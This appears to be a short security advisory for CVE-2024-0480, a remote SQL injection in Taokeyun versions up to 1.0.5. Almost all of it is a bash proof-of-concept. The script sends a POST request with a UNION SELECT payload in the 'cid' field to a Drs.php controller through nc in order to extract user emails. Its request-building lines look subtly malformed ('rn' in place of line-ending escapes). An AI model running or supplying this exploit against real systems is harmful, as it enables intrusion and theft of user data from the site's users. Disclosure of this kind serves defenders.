Taokeyun versions up to 1.0.5 suffers from a remote SQL injection vulnerability.
advisories | CVE-2024-0480
#!/bin/bash
# Variables
url="http://example.com/path/to/taokeyun/application/index/controller/m/Drs.php"
cid="1' UNION SELECT 1,2,3,4,5,6,7,8,9,email FROM users-- -"
# Construct the request
request="POST $url HTTP/1.1rn"
request+="Content-Type: application/x-www-form-urlencodedrn"
request+="Content-Length: $((${#cid}+15))rnrn"
request+="$cid"
# Send the request
(echo -e "$request") | nc example.com 80
